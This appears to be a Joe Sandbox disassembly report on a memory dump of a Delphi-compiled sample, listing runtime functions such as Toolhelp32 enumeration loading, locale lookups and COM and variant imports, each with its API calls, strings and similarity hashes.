Function 02B3A954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B3ABDB,?,?,02B3AC6D,00000000,02B3AD49), ref: 02B3A968
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B3A980
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B3A992
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B3A9A4
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B3A9B6
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B3A9C8
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B3A9DA
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B3A9EC
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B3A9FE
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B3AA10
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B3AA22
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B3AA34
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B3AA46
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B3AA58
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B3AA6A
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B3AA7C
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B3AA8E

Strings

Process32NextW, xrefs: 02B3AA1A
Process32First, xrefs: 02B3A9E4
Toolhelp32ReadProcessMemory, xrefs: 02B3A9D2
Heap32ListFirst, xrefs: 02B3A98A
Module32First, xrefs: 02B3AA50
Heap32First, xrefs: 02B3A9AE
CreateToolhelp32Snapshot, xrefs: 02B3A978
Thread32Next, xrefs: 02B3AA3E
Module32Next, xrefs: 02B3AA62
Module32NextW, xrefs: 02B3AA86
Heap32Next, xrefs: 02B3A9C0
kernel32.dll, xrefs: 02B3A963
Process32FirstW, xrefs: 02B3AA08
Heap32ListNext, xrefs: 02B3A99C
Thread32First, xrefs: 02B3AA2C
Module32FirstW, xrefs: 02B3AA74
Process32Next, xrefs: 02B3A9F6

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: d82fce0bec06be86fd5439931257e157665c278c4867a57417a96e3f3180894f
Instruction ID: 8b9c0a91e732243161c09d8a7148152fa5b14bcba0698a54c4a672503646aa77
Opcode Fuzzy Hash: d82fce0bec06be86fd5439931257e157665c278c4867a57417a96e3f3180894f
Instruction Fuzzy Hash: 3931E7B0A91360AFEB12AFB8DC95AE637E9EB05740B1009E5F04ECF215E7749815CF91

Function 02B258B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B258D1
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B258E8
lstrcpynA.KERNEL32(?,?,?), ref: 02B25918
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B2597C
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259B2
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259C5
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259D7
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259E3
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000), ref: 02B25A17
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330), ref: 02B25A23
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B25A45

Strings

\, xrefs: 02B259F5
kernel32.dll, xrefs: 02B258CC
GetLongPathNameA, xrefs: 02B258DF

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 872f257b6b04869d87247dd964f354147b7dffd4ccc2b38a04f8a74b8bb427a6
Instruction ID: ef19b5861f0a776c3709b57b8a60613d9e1f53b3104abb0afcf131cdb76060ab
Opcode Fuzzy Hash: 872f257b6b04869d87247dd964f354147b7dffd4ccc2b38a04f8a74b8bb427a6
Instruction Fuzzy Hash: 80415C71D00369AFDB20DAE8CC88ADEB3ADEB09310F4445E5A55DE7242D770DB488F50

Function 02B25B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25C97

Strings

Software\Borland\Delphi\Locales, xrefs: 02B25AE4
Software\Borland\Locales, xrefs: 02B25AA8, 02B25AC6

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction ID: 4e7c4795c87d4e92b067478b9e8efea4f613c2413f3a0341889c71a407bfe146
Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction Fuzzy Hash: 723147B1E5033C6AEB35DAB89C45BEF77AD9B04380F4441E1A64CE6182E6749E8C8F50

Function 02B27F52 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B27F75

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
Instruction ID: 86d81e3383bfd5107e75066fa776f5b6d644b7628be5b0c381dc24be524bb113
Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
Instruction Fuzzy Hash: E71100B5A00209AF9B04CF99C9809EFF7F9EFC8314B14C569A509EB254E6319A018B90

Function 02B2A744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
Instruction ID: 35a3ec67dbf0fe8769cda405791b51436c037b8161daa7ddb537672a3e602f75
Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
Instruction Fuzzy Hash: 9FE0D83570032417D311A5685C809F6B36D9B5C310F0041FEBD4DC7391EDA09D484EE8

Function 02B2B70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02B4C106,00000000,02B4C11E), ref: 02B2B71A

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 4189a973054fdabbd04d8bf6fde7435a292a0ad65bee57349382d14a855aa87f
Instruction ID: ecf8714acdbaaf4c9e509bd56a863722ef7d7c6f0ace28d3950ad161f215306c
Opcode Fuzzy Hash: 4189a973054fdabbd04d8bf6fde7435a292a0ad65bee57349382d14a855aa87f
Instruction Fuzzy Hash: 92F0DA78A443129FD350DF28D580F1577E5FB49B54F8089A9E89CC7390EB389418CF52

Function 02B2A790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B2BDF2,00000000,02B2C00B,?,?,00000000,00000000), ref: 02B2A7A3

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
Instruction ID: 62a810153de6e0ef121c48807820436cf0107c596635a4854f344034414b8934
Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
Instruction Fuzzy Hash: 19D05EB630E3702AA220915A2D84DBBAAFCCBC57A1F0044BEF58CC6250D2008C0996F5

Function 02B2918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02B29190

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
Instruction ID: 2172b8c1bf90d8fd47c673e84136d5d5999d84b6ffb7ec30655d161e2957ab61
Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
Instruction Fuzzy Hash: 8EA0121040483001854037180C0217531445900620FC40FC068FC503D0ED1D012440D3

Function 02B4D596 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5447e1caf31241e37e979d0d046299419a723541b8118e72370ed4302aab877
Instruction ID: 552d0ca9083f253b7d3ad4b12e5ccd3adfcfc18fee7c168d114072fdd1bad608
Opcode Fuzzy Hash: b5447e1caf31241e37e979d0d046299419a723541b8118e72370ed4302aab877
Instruction Fuzzy Hash: 9E518E9641D3C24FC7635F3494E92C23FA1AD6312874E15DAC8E08F2A3E61A490BDF22

Function 02B220C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 02B2D214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B2D21D

Part of subcall function 02B2D1E8: GetProcAddress.KERNEL32(00000000), ref: 02B2D201

Strings

VarCmp, xrefs: 02B2D333
oleaut32.dll, xrefs: 02B2D218
VarBstrFromCy, xrefs: 02B2D3CD
VarBstrFromDate, xrefs: 02B2D3E3
VarNot, xrefs: 02B2D257
VarOr, xrefs: 02B2D307
VarIdiv, xrefs: 02B2D2C5
VarR4FromStr, xrefs: 02B2D35F
VarXor, xrefs: 02B2D31D
VarBoolFromStr, xrefs: 02B2D3B7
VarCyFromStr, xrefs: 02B2D3A1
VarAdd, xrefs: 02B2D26D
VarMul, xrefs: 02B2D299
VarSub, xrefs: 02B2D283
VarNeg, xrefs: 02B2D241
VarAnd, xrefs: 02B2D2F1
VarDiv, xrefs: 02B2D2AF
VarR8FromStr, xrefs: 02B2D375
VarBstrFromBool, xrefs: 02B2D3F9
VarDateFromStr, xrefs: 02B2D38B
VarI4FromStr, xrefs: 02B2D349
VarMod, xrefs: 02B2D2DB
VariantChangeTypeEx, xrefs: 02B2D22B

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: e1081c6884ab5b775a44db948e857c2ec21c8e78325d63cc3f794430c1ba0e3b
Instruction ID: bde7d9d7a449cb8dee3ee202645d36836a840eebd6ee8025c2ac599a92860fb8
Opcode Fuzzy Hash: e1081c6884ab5b775a44db948e857c2ec21c8e78325d63cc3f794430c1ba0e3b
Instruction Fuzzy Hash: B7416D62A9533A4B12086F6D780042B7F9ED7883913A144DFF05CCBB44DD20B99F8E6A

Function 02B36E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B36E5E
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B36E6F
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B36E7F
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B36E8F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B36E9F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B36EAF
GetProcAddress.KERNEL32(00000002), ref: 02B36EBF

Strings

CoSuspendClassObjects, xrefs: 02B36EB9
CoResumeClassObjects, xrefs: 02B36EA9
ole32.dll, xrefs: 02B36E59
CoReleaseServerProcess, xrefs: 02B36E99
CoAddRefServerProcess, xrefs: 02B36E89
CoCreateInstanceEx, xrefs: 02B36E69
CoInitializeEx, xrefs: 02B36E79

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: 7c1ac579edc1bab7adcac2cf1e6fcf44590bbdadbe6e82608f0c32e2d7631765
Instruction ID: 5bc7630051104b472d665a981389d4396ac15851a889144abf612cbc984658ac
Opcode Fuzzy Hash: 7c1ac579edc1bab7adcac2cf1e6fcf44590bbdadbe6e82608f0c32e2d7631765
Instruction Fuzzy Hash: ADF0ACB8A883727EB3137F709CC18673BDDE701A4470019E6B61696A12DAB5841C4F64

Function 02B22530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B228CE

Strings

Unknown, xrefs: 02B2278C
String, xrefs: 02B227A1
bytes: , xrefs: 02B2275D
7, xrefs: 02B226A1
An unexpected memory leak has occurred. , xrefs: 02B22690
Unexpected Memory Leak, xrefs: 02B228C0
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B22849
The unexpected small block leaks are:, xrefs: 02B22707
, xrefs: 02B22814

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 30f2382ea7ac69a246c6190321eefd1c97b25157a34f9ba4d3c5bfee8643d1eb
Instruction ID: ef074bb8b2e0ef6134537f12044adc3609150cac9be9238bd9d79d37fc45beac
Opcode Fuzzy Hash: 30f2382ea7ac69a246c6190321eefd1c97b25157a34f9ba4d3c5bfee8643d1eb
Instruction Fuzzy Hash: 6AA1B131A043788BDB21AA2CCC84B99B6E5EB09350F1441E5ED4DEB386CB7599CECF51

Function 02B2252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

bytes: , xrefs: 02B2275D
7, xrefs: 02B226A1
An unexpected memory leak has occurred. , xrefs: 02B22690
Unexpected Memory Leak, xrefs: 02B228C0
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B22849
The unexpected small block leaks are:, xrefs: 02B22707
, xrefs: 02B22814

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: f2983cb85add3d6b13230e4230c5e30f00bd3d797609e6ccf031857a607d5b37
Instruction ID: 52f48dc29ee7f02ac22b639924af9f6a8f66314d1e7bdd7a70e2c2592ca10a98
Opcode Fuzzy Hash: f2983cb85add3d6b13230e4230c5e30f00bd3d797609e6ccf031857a607d5b37
Instruction Fuzzy Hash: 5D719230A043788FDB21AA2CCC84BD9BAE5EB09754F1041E5D94DEB281DB759AC9CF51

Function 02B2BD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02B2C00B,?,?,00000000,00000000), ref: 02B2BD76

Part of subcall function 02B2A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762

Strings

m/d/yy, xrefs: 02B2BE45
AMPM, xrefs: 02B2BF8A
:mm, xrefs: 02B2BFA9
:mm:ss, xrefs: 02B2BFC6
mmmm d, yyyy, xrefs: 02B2BE72
AMPM , xrefs: 02B2BF99

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
